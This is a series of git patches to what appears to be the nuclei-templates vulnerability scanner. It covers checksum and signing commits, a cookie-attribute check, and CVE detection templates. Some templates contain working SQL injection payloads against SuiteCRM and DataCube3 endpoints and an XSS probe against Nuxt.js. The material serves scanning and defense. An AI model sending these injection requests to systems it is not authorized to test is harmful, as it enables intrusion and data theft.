http/cves/2023/CVE-2023-5089.yaml:c51f608a3a99b7a7ea1a90f49badde7d12cf1e6f http/cves/2023/CVE-2023-50917.yaml:f0cb72641b1188fc2f7a615137512a1b956eeeba http/cves/2023/CVE-2023-50968.yaml:ba55dd8cde0223755e58c18a48ae9e7a5407aa62 -http/cves/2023/CVE-2023-51449.yaml:04c76de5d4ae42aa4eb7299becf27b87b3381e68 +http/cves/2023/CVE-2023-51449.yaml:f17017eea15c6a52827c4f6f17aec59624bfd30a http/cves/2023/CVE-2023-51467.yaml:ca66217bafda2b96c5c17cad532af4bee418699d http/cves/2023/CVE-2023-52085.yaml:8b9252b4ee0f19700fdbf7777b1865551167c2d8 http/cves/2023/CVE-2023-5244.yaml:e8676ea3fe8f5fdbf6a62de0894078ce7445b00d @@ -3274,7 +3275,7 @@ http/cves/2024/CVE-2024-1380.yaml:20b25b6bb316198f59ab5b21284278df2eeb480f http/cves/2024/CVE-2024-1561.yaml:659c9112fbbf202496c98637b8ffcfd2665024ab http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 http/cves/2024/CVE-2024-1709.yaml:fbffa10f3832defdae69499878e00010a44c1b0a -http/cves/2024/CVE-2024-1728.yaml:7cafeaf0ee890de1de7e0e2833d5f3a23f99aaa0 +http/cves/2024/CVE-2024-1728.yaml:53f4b2e0ca6437434e903db273382fb8d009fd46 http/cves/2024/CVE-2024-20767.yaml:241fd099c8ac13ce65b6bc56f755be96783242a2 http/cves/2024/CVE-2024-21644.yaml:48021ee39de24e3ea1ef7e900a5a28ebed70f411 http/cves/2024/CVE-2024-21645.yaml:0b8856904f2d109744123490861e51f34afcff6b @@ -8652,7 +8653,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e1c172289b2c9095c0e10b61fdc8347d39fc72b7 +templates-checksum.txt:240c9d6114b0ee4681904016c5b36a03f448241a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 4416d48e0e980d89efdf1dbc8cfb89c23ba184c3 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 16 Jun 2024 11:33:47 +0000 Subject: [PATCH 0275/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 862ea30229..933313d5d5 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -7,6 +7,7 @@ on: - 'dast/vulnerabilities/sqli/time-based-sqli.yaml' - 'http/cves/2021/CVE-2021-38146.yaml' - 'http/cves/2021/CVE-2021-38147.yaml' + - 'http/cves/2021/CVE-2021-43831.yaml' - 'http/cves/2023/CVE-2023-38194.yaml' - 'http/cves/2023/CVE-2023-43472.yaml' - 'http/cves/2023/CVE-2023-51449.yaml' From 4ded154143975af1fc139ce306c0584c466c7ba2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 16 Jun 2024 11:34:53 +0000 Subject: [PATCH 0276/1841] Auto Template Signing [Sun Jun 16 11:34:53 UTC 2024] :robot: --- http/cves/2021/CVE-2021-43831.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2021/CVE-2021-43831.yaml b/http/cves/2021/CVE-2021-43831.yaml index 41bdceadc2..6413d759a1 100644 --- a/http/cves/2021/CVE-2021-43831.yaml +++ b/http/cves/2021/CVE-2021-43831.yaml @@ -51,3 +51,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022032ecd11c32d5ba5b3a614d6572928a93718eecf820b73a7ed7613c012085b9af02207bceba36fe78c3968f2ca537e592c5f1c5e3aee5a141a64a0d7a9932c9f3af4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 223f03ca62609bbe531d12545ba48224605c30ab Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 16 Jun 2024 18:15:43 +0530 Subject: [PATCH 0277/1841] updated matcher, req type & info --- http/cves/2024/CVE-2024-36412.yaml | 40 +++++++++++++++++++----------- 1 file changed, 25 insertions(+), 15 deletions(-) diff --git a/http/cves/2024/CVE-2024-36412.yaml b/http/cves/2024/CVE-2024-36412.yaml index 2728bf88e2..cc86830991 100644 --- a/http/cves/2024/CVE-2024-36412.yaml +++ b/http/cves/2024/CVE-2024-36412.yaml @@ -1,32 +1,42 @@ id: CVE-2024-36412 info: - name: SuiteCRM SQL Injection + name: SuiteCRM - SQL Injection author: securityforeveryone.com severity: critical description: | SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a vulnerability in events response entry point allows for a SQL injection attack. Versions 7.14.4 and 8.6.1 contain a fix for this issue. - remediation: 7.14.4 and 8.6.1 + remediation: | + 7.14.4 and 8.6.1 reference: - https://0x5001.com/web-security/cve-2024-36412-proof-of-concept - - https://www.tenable.com/cve/CVE-2024-36412 - tags: SuiteCRM,cve,cve2024 + - https://nvd.nist.gov/vuln/detail/CVE-2024-36412 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-36412 + cwe-id: CWE-89 + cpe: cpe:2.3:a:salesagility:suitecrm:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + verified: true + vendor: salesagility + product: suitecrm + shodan-query: title:"SuiteCRM" + fofa-query: title="SuiteCRM" + tags: cve,cve2024,suitecrm,sqli http: - - method: GET - path: - - '{{BaseURL}}/index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(4);--+-&type=c&response=accept' + - raw: + - | + @timeout: 15s + GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(6);--+-&type=c&response=accept HTTP/1.1 + Host: {{Hostname}} - matchers-condition: and matchers: - - type: word - words: - - "You have already responded to the invitation or there was a problem with the link. Please contact the sender of the invite for help" - - "Thank you for accepting" - condition: or - - type: dsl dsl: - - 'duration>=4' + - 'duration>=6' - 'status_code == 200' + - 'contains_any(body, "You have already responded to the invitation or there", "Thank you for accepting")' condition: and From c68fc3215fb273580891886a530a481948668b47 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=88=91=E4=BC=9A=E5=95=8AD=2C=E6=98=8E=E5=B0=8F=E5=AD=90?= =?UTF-8?q?=2C=E5=BE=A1=E5=89=91?= <104293903+pwnhxl@users.noreply.github.com> Date: Sun, 16 Jun 2024 22:31:29 +0800 Subject: [PATCH 0278/1841] Fix false positives --- http/vulnerabilities/nuxt/nuxt-js-xss.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/http/vulnerabilities/nuxt/nuxt-js-xss.yaml b/http/vulnerabilities/nuxt/nuxt-js-xss.yaml index 5b906e98b6..b3221501cf 100644 --- a/http/vulnerabilities/nuxt/nuxt-js-xss.yaml +++ b/http/vulnerabilities/nuxt/nuxt-js-xss.yaml @@ -17,17 +17,20 @@ info: fofa-query: body="buildAssetsDir" && body="__nuxt" tags: huntr,xss,nuxtjs,error +variables: + payload: "" + http: - method: GET path: - - "{{BaseURL}}/__nuxt_error?stack=%0A" + - "{{BaseURL}}/__nuxt_error?stack=%0A{{url_encode(payload)}}" matchers-condition: and matchers: - type: word part: body words: - - "" + - "{{payload}}" - "window.__NUXT__" condition: and From e446518f77e644b5b705e7780659eb356bbd0b5b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 17 Jun 2024 11:42:32 +0530 Subject: [PATCH 0279/1841] Update nuxt-js-xss.yaml --- http/vulnerabilities/nuxt/nuxt-js-xss.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/vulnerabilities/nuxt/nuxt-js-xss.yaml b/http/vulnerabilities/nuxt/nuxt-js-xss.yaml index b3221501cf..6a4dc91654 100644 --- a/http/vulnerabilities/nuxt/nuxt-js-xss.yaml +++ b/http/vulnerabilities/nuxt/nuxt-js-xss.yaml @@ -1,7 +1,7 @@ id: nuxt-js-xss info: - name: Error Page XSS - Nuxt.js + name: Nuxt.js Error Page - Cross-Site Scripting author: DhiyaneshDK severity: medium description: | @@ -11,11 +11,11 @@ info: - https://bryces.io/blog/nuxt3 - https://twitter.com/fofabot/status/1669339995780558849 metadata: - verified: "true" + verified: true max-request: 1 shodan-query: html:"buildAssetsDir" "nuxt" fofa-query: body="buildAssetsDir" && body="__nuxt" - tags: huntr,xss,nuxtjs,error + tags: huntr,xss,nuxtjs variables: payload: "" From 6bbbb0b2acda0b8d7f68ef024f491fb69f304ee9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 17 Jun 2024 11:45:42 +0530 Subject: [PATCH 0280/1841] lint fix --- http/vulnerabilities/nuxt/nuxt-js-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/nuxt/nuxt-js-xss.yaml b/http/vulnerabilities/nuxt/nuxt-js-xss.yaml index 6a4dc91654..850606f211 100644 --- a/http/vulnerabilities/nuxt/nuxt-js-xss.yaml +++ b/http/vulnerabilities/nuxt/nuxt-js-xss.yaml @@ -1,7 +1,7 @@ id: nuxt-js-xss info: - name: Nuxt.js Error Page - Cross-Site Scripting + name: Nuxt.js Error Page - Cross-Site Scripting author: DhiyaneshDK severity: medium description: | From b360b9cb500231c35562eb77cce946f0ed3b2b45 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 17 Jun 2024 11:54:12 +0530 Subject: [PATCH 0281/1841] updated matcher type & info --- http/cves/2024/CVE-2024-28995.yaml | 23 ++++++++++++++--------- 1 file changed, 14 insertions(+), 9 deletions(-) diff --git a/http/cves/2024/CVE-2024-28995.yaml b/http/cves/2024/CVE-2024-28995.yaml index ce5d645122..cab4691702 100644 --- a/http/cves/2024/CVE-2024-28995.yaml +++ b/http/cves/2024/CVE-2024-28995.yaml @@ -10,9 +10,17 @@ info: - https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis - https://nvd.nist.gov/vuln/detail/CVE-2024-28995 - https://x.com/stephenfewer/status/1801191416741130575 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-28995 + cwe-id: CWE-22 + cpe: cpe:2.3:a:solarwinds:serv-u:*:*:*:*:*:*:*:* metadata: verified: true - max-request: 1 + max-request: 2 + vendor: solarwinds + product: serv-u shodan-query: html:"Serv-U" fofa-query: server="Serv-U" tags: cve,cve2024,lfi,solarwinds,serv-u @@ -37,11 +45,8 @@ http: - "\\[(font|extension|file)s\\]" condition: or - - type: word - part: header - words: - - "Serv-U" - - - type: status - status: - - 200 + - type: dsl + dsl: + - 'contains(header, "Serv-U")' + - 'status_code == 200' + condition: and From 9ba50295551b86877e1b3099ae32138ae1c2b224 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 17 Jun 2024 06:25:32 +0000 Subject: [PATCH 0283/1841] Auto Generated Templates Checksum [Mon Jun 17 06:25:32 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index f269c77a5d..8ce693b54f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -620,6 +620,7 @@ helpers/wordlists/mdb-paths.txt:c380943cfa8a337ccb1ea38062e2856924960f1a helpers/wordlists/mysql-passwords.txt:39cb7f9500b441097c09510fbf93b7c123cd77e9 helpers/wordlists/mysql-users.txt:d46fe9fd35f6b8d4de6901572e04bcc0845e8332 helpers/wordlists/numbers.txt:8084f0f10255c5e26605a1cb1f51c5e53f92df40 +helpers/wordlists/params.txt:503c5527904f6c8846d31f87b1ac565c61d7c6c6 helpers/wordlists/prestashop-modules.txt:ae73ac19d088b28a943e8a9ce98ab4461e4dc029 helpers/wordlists/shiro_encrypted_keys.txt:3a072e8246dabee62eecfd62edef1b3977165f34 helpers/wordlists/ssh-passwords.txt:04aaf532580a605e8356df448196ac06939ad544 @@ -2366,7 +2367,7 @@ http/cves/2021/CVE-2021-43734.yaml:ba2e81ae59684a8bcfde140cc091cb3a77e3f427 http/cves/2021/CVE-2021-43778.yaml:2f3bb0a0f9ad88cc38b6dfa0abda010822203ea9 http/cves/2021/CVE-2021-43798.yaml:6afb9139e24bf0c40b9e5a0c12e49f83793920c2 http/cves/2021/CVE-2021-43810.yaml:e091cab75505c3576561a0e55d7f45be46ed0e9f -http/cves/2021/CVE-2021-43831.yaml:4d7711b2a10764400dc49140a119261251d4a223 +http/cves/2021/CVE-2021-43831.yaml:89f39234d1633cece6948896980a84ad95fafcb4 http/cves/2021/CVE-2021-44077.yaml:cb77a5c0a315f9be21761f87ed2d2c7d51fd1d5d http/cves/2021/CVE-2021-44138.yaml:a802f5e3f53e4f8211dfd348b2ca5ddcb9304732 http/cves/2021/CVE-2021-44139.yaml:740e49a49ce3c88b450eabd43ae798ffcacf8a0e @@ -7724,7 +7725,7 @@ http/vulnerabilities/netsweeper/netsweeper-rxss.yaml:7ee726ace09d4659b2f3980105a http/vulnerabilities/nps/nps-auth-bypass.yaml:90ea2e05d4bf385db0ceee0c92415817731d8a15 http/vulnerabilities/nuxt/nuxt-js-lfi.yaml:d51646219a3065dbf4024260104c2513d9e516d3 http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml:24cfa8b0b2dbd99b1eb75704e139da55e275274f -http/vulnerabilities/nuxt/nuxt-js-xss.yaml:136a0b904e00e30b73c966536aa6f4110be49e39 +http/vulnerabilities/nuxt/nuxt-js-xss.yaml:43f3b20dd086b1dde378ff6d2139968817e98438 http/vulnerabilities/opencpu/opencpu-rce.yaml:d13458a710e74a36c6b74a216677b4a40a9562d0 http/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml:cbfc4feae73c9796e2cde0471a9891ae967a1655 http/vulnerabilities/oracle/oracle-ebs-xss.yaml:a395970ecf5cd11fc483b759836bc4402f2489ce @@ -8653,7 +8654,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:240c9d6114b0ee4681904016c5b36a03f448241a +templates-checksum.txt:0686dbb0d5c5f78329268660fdb9b45d2d7921d3 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 371b26f343465e1071d1979f7447fab02d77d969 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 17 Jun 2024 06:27:14 +0000 Subject: [PATCH 0284/1841] Auto Template Signing [Mon Jun 17 06:27:14 UTC 2024] :robot: --- http/vulnerabilities/nuxt/nuxt-js-xss.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/vulnerabilities/nuxt/nuxt-js-xss.yaml b/http/vulnerabilities/nuxt/nuxt-js-xss.yaml index 850606f211..9e7acdd8aa 100644 --- a/http/vulnerabilities/nuxt/nuxt-js-xss.yaml +++ b/http/vulnerabilities/nuxt/nuxt-js-xss.yaml @@ -38,5 +38,4 @@ http: part: header words: - "text/html" - -# digest: 4a0a00473045022100858932f971761dbf5f90cae1f6fd762587bc8db062bc348a0e75e6919d1c1ed502207f3e15e50de570269cc2d415aea273f1abb2440e270d272e572e7081f2a59402:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e184ac245cc42774284e2fda8f4ffd559e46ffb273b587dfab98c576f73b92fa022100931427a4621c57da048aa4fdc2981b8ad64512cf8d4894e3dc3f1ce607d0b090:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From dde13d624f8e293a5a22ff105de44b773452c8ab Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 17 Jun 2024 06:51:31 +0000 Subject: [PATCH 0285/1841] Auto Generated New Template Addition List [Mon Jun 17 06:51:31 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6ddcfff2fe..f2cb4f47b7 100644 --- a/.new-additions +++ b/.new-additions @@ -11,6 +11,7 @@ http/cves/2023/CVE-2023-6786.yaml http/cves/2024/CVE-2024-0250.yaml http/cves/2024/CVE-2024-1728.yaml http/cves/2024/CVE-2024-23692.yaml +http/cves/2024/CVE-2024-28995.yaml http/cves/2024/CVE-2024-32113.yaml http/cves/2024/CVE-2024-37393.yaml http/exposed-panels/lorex-panel.yaml From bfb1339d2a0aeaad4a203ba48644bb89a1423ad2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 17 Jun 2024 06:51:42 +0000 Subject: [PATCH 0286/1841] Auto Generated Templates Checksum [Mon Jun 17 06:51:42 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8ce693b54f..1e8107069e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3309,6 +3309,7 @@ http/cves/2024/CVE-2024-28255.yaml:d7b149c542f2dba2d719e547ddc497ad029532e8 http/cves/2024/CVE-2024-28734.yaml:282a40ba7cd7f653bfbc9f16397b9c6115ca18b1 http/cves/2024/CVE-2024-2876.yaml:33b7f45b1e5e63e6936315618a667d8cd07d054b http/cves/2024/CVE-2024-2879.yaml:c2ce4ab84a2eac56ef529eeba7a3749e0394cd43 +http/cves/2024/CVE-2024-28995.yaml:68258e16a2266348d3a5e89585095b3de67272bc http/cves/2024/CVE-2024-29059.yaml:8339d52df93cf5aa744acd122780080e989fe7ca http/cves/2024/CVE-2024-29269.yaml:b0c582055d752cae9d0837e9c4919e94c0fdf100 http/cves/2024/CVE-2024-3097.yaml:b45cd14894d2dd544156fa7b88ec579b871834a9 @@ -7725,7 +7726,7 @@ http/vulnerabilities/netsweeper/netsweeper-rxss.yaml:7ee726ace09d4659b2f3980105a http/vulnerabilities/nps/nps-auth-bypass.yaml:90ea2e05d4bf385db0ceee0c92415817731d8a15 http/vulnerabilities/nuxt/nuxt-js-lfi.yaml:d51646219a3065dbf4024260104c2513d9e516d3 http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml:24cfa8b0b2dbd99b1eb75704e139da55e275274f -http/vulnerabilities/nuxt/nuxt-js-xss.yaml:43f3b20dd086b1dde378ff6d2139968817e98438 +http/vulnerabilities/nuxt/nuxt-js-xss.yaml:9d37aae5f57e72101d40715ef24bb1fa7cf527d4 http/vulnerabilities/opencpu/opencpu-rce.yaml:d13458a710e74a36c6b74a216677b4a40a9562d0 http/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml:cbfc4feae73c9796e2cde0471a9891ae967a1655 http/vulnerabilities/oracle/oracle-ebs-xss.yaml:a395970ecf5cd11fc483b759836bc4402f2489ce @@ -8654,7 +8655,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:0686dbb0d5c5f78329268660fdb9b45d2d7921d3 +templates-checksum.txt:f168f9cc3aca0892d4ca3a5b350d46eb53981e9d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 5550c9b86de02c677d5b62402af357fe25e81c55 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 17 Jun 2024 06:52:19 +0000 Subject: [PATCH 0287/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 933313d5d5..f0202516e8 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -16,6 +16,7 @@ on: - 'http/cves/2024/CVE-2024-0250.yaml' - 'http/cves/2024/CVE-2024-1728.yaml' - 'http/cves/2024/CVE-2024-23692.yaml' + - 'http/cves/2024/CVE-2024-28995.yaml' - 'http/cves/2024/CVE-2024-32113.yaml' - 'http/cves/2024/CVE-2024-37393.yaml' - 'http/exposed-panels/lorex-panel.yaml' From 30de88f76abdf5fb9ec16ce294e24ccca9f4cd8f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 17 Jun 2024 06:53:26 +0000 Subject: [PATCH 0288/1841] Auto Template Signing [Mon Jun 17 06:53:25 UTC 2024] :robot: --- http/cves/2024/CVE-2024-28995.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-28995.yaml b/http/cves/2024/CVE-2024-28995.yaml index cab4691702..f8cddca8d2 100644 --- a/http/cves/2024/CVE-2024-28995.yaml +++ b/http/cves/2024/CVE-2024-28995.yaml @@ -50,3 +50,4 @@ http: - 'contains(header, "Serv-U")' - 'status_code == 200' condition: and +# digest: 4a0a00473045022100f7464125ccd5146080c76c675872c18c8bd0eb548bb8b1ba0cb9a979e4a8db9b02204c5cfd2b1ac281a288ed84c4fe0fe06376db38e710553793adf0216811a0a537:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 8fae7656b52b16c25841153eece8511cba78ecac Mon Sep 17 00:00:00 2001 From: vthiery Date: Mon, 17 Jun 2024 09:01:21 +0200 Subject: [PATCH 0289/1841] fix: split template for HttpOnly and Secure attributes --- ...ure.yaml => cookies-without-httponly.yaml} | 6 +-- .../cookies-without-secure.yaml | 41 +++++++++++++++++++ 2 files changed, 43 insertions(+), 4 deletions(-) rename http/misconfiguration/{cookies-without-httponly-secure.yaml => cookies-without-httponly.yaml} (77%) create mode 100644 http/misconfiguration/cookies-without-secure.yaml diff --git a/http/misconfiguration/cookies-without-httponly-secure.yaml b/http/misconfiguration/cookies-without-httponly.yaml similarity index 77% rename from http/misconfiguration/cookies-without-httponly-secure.yaml rename to http/misconfiguration/cookies-without-httponly.yaml index 7a2cacaabb..e0164149ee 100644 --- a/http/misconfiguration/cookies-without-httponly-secure.yaml +++ b/http/misconfiguration/cookies-without-httponly.yaml @@ -1,7 +1,7 @@ -id: cookies-without-httponly-secure +id: cookies-without-httponly info: - name: Cookies without HttpOnly or Secure attribute - Detect + name: Cookies without HttpOnly attribute - Detect author: princechaddha,Mr.Bobo HP severity: info description: | @@ -38,6 +38,4 @@ http: part: header words: - "HttpOnly" - - "Secure" negative: true -# digest: 4a0a004730450220123181274d69492219d698d89cf1fd5d0b71c908b139b6a52e15df69c7b8c6aa022100da21796dba95fc800f492b76bed8877b493b296856dc7f71fe89da22aff0fe3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/cookies-without-secure.yaml b/http/misconfiguration/cookies-without-secure.yaml new file mode 100644 index 0000000000..7094dc6928 --- /dev/null +++ b/http/misconfiguration/cookies-without-secure.yaml @@ -0,0 +1,41 @@ +id: cookies-without-secure + +info: + name: Cookies without Secure attribute - Detect + author: vthiery + severity: info + description: | + Checks whether cookies in the HTTP response contain the Secure attribute. If the Secure flag is set, it means that the cookie can only be transmitted over HTTPS + impact: | + Lack of Secure flag on cookies allows the cookie to be sent over unsecure HTTP, making it vulnerable to man-in-the-middle (MITM) attacks. + remediation: | + Ensure that all cookies are set with the Secure attribute to prevent MITM attacks. + reference: + - https://owasp.org/www-community/controls/SecureCookieAttribute + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + metadata: + verified: true + max-request: 1 + tags: misconfig,http,cookie,generic + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Set-Cookie' + + - type: word + part: header + words: + - "Secure" + negative: true From de9dabeca8079d75992eaa098ccec03d6e0b92a1 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 17 Jun 2024 13:39:06 +0530 Subject: [PATCH 0290/1841] Create CVE-2024-31750.yaml --- http/cves/2024/CVE-2024-31750.yaml | 39 ++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 http/cves/2024/CVE-2024-31750.yaml diff --git a/http/cves/2024/CVE-2024-31750.yaml b/http/cves/2024/CVE-2024-31750.yaml new file mode 100644 index 0000000000..27bfb40ba5 --- /dev/null +++ b/http/cves/2024/CVE-2024-31750.yaml @@ -0,0 +1,39 @@ +id: CVE-2024-31750 + +info: + name: F-logic DataCube3 Sql Injection + author: DhiyaneshDK + severity: high + description: | + SQL injection vulnerability in f-logic datacube3 v.1.0 allows a remote attacker to obtain sensitive information via the req_id parameter. + reference: + - https://github.com/lampSEC/semcms/blob/main/datacube3.md + - https://github.com/MrWQ/vulnerability-paper/blob/master/bugs/DataCube3%20getting_index_data.php%20SQL%20%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md + - https://nvd.nist.gov/vuln/detail/CVE-2024-31750 + - https://github.com/wjlin0/poc-doc + - https://github.com/wy876/POC + classification: + epss-score: 0.00043 + epss-percentile: 0.0866 + metadata: + verified: true + max-request: 1 + fofa-query: title="DataCube3" + tags: cve,cve2024,datacube3,sqli + +http: + - raw: + - | + POST /admin/pr_monitor/getting_index_data.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + req_id=1) UNION ALL SELECT CHAR(113,120,107,107,113)||CHAR(117,78,85,110,71,119,86,122,111,101,81,87,68,72,80,107,90,112,111,110,120,72,78,70,76,99,100,81,80,77,89,75,86,65,105,99,74,67,122,107)||CHAR(113,106,120,122,113),NULL,NULL-- sTqG + + matchers: + - type: dsl + dsl: + - 'status_code==200' + - 'contains(body, "qxkkquNUnGwVzoeQWDHPkZponxHNFLcdQPMYKVAicJCzkqjxzq")' + - 'contains(header, "application/json")' + condition: and From 4396d7b6ffda54dd3ab2b889c3d65aa712d26d28 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 17 Jun 2024 13:41:25 +0530 Subject: [PATCH 0291/1841] minor update --- http/cves/2024/CVE-2024-31750.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-31750.yaml b/http/cves/2024/CVE-2024-31750.yaml index 27bfb40ba5..39194f53a7 100644 --- a/http/cves/2024/CVE-2024-31750.yaml +++ b/http/cves/2024/CVE-2024-31750.yaml @@ -23,14 +23,14 @@ info: http: - raw: - - | + - | POST /admin/pr_monitor/getting_index_data.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded req_id=1) UNION ALL SELECT CHAR(113,120,107,107,113)||CHAR(117,78,85,110,71,119,86,122,111,101,81,87,68,72,80,107,90,112,111,110,120,72,78,70,76,99,100,81,80,77,89,75,86,65,105,99,74,67,122,107)||CHAR(113,106,120,122,113),NULL,NULL-- sTqG - matchers: + matchers: - type: dsl dsl: - 'status_code==200' From 1ff5be962e6023c6c9c140afd06393cfffb7eed8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 17 Jun 2024 13:59:38 +0530 Subject: [PATCH 0292/1841] Create CVE-2024-2621.yaml --- http/cves/2024/CVE-2024-2621.yaml | 41 +++++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 http/cves/2024/CVE-2024-2621.yaml diff --git a/http/cves/2024/CVE-2024-2621.yaml b/http/cves/2024/CVE-2024-2621.yaml new file mode 100644 index 0000000000..9bf0b453a0 --- /dev/null +++ b/http/cves/2024/CVE-2024-2621.yaml @@ -0,0 +1,41 @@ +id: CVE-2024-2621 + +info: + name: Fujian Kelixin Communication - Command Injection + author: DhiyaneshDk + severity: medium + description: | + A vulnerability was found in Fujian Kelixin Communication Command and Dispatch Platform up to 20240318 and classified as critical. Affected by this issue is some unknown functionality of the file api/client/user/pwd_update.php. + reference: + - https://h0e4a0r1t.github.io/2024/vulns/Fujian%20Kelixin%20Communication%20Co.,%20Ltd.%20Command%20and%20Dispatch%20Platform%20SQL%20Injection%20Vulnerability-pwd_update.php.pdf + - https://vuldb.com/?ctiid.257198 + - https://vuldb.com/?id.257198 + - https://github.com/NaInSec/CVE-LIST + - https://github.com/fkie-cad/nvd-json-data-feeds + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L + cvss-score: 6.3 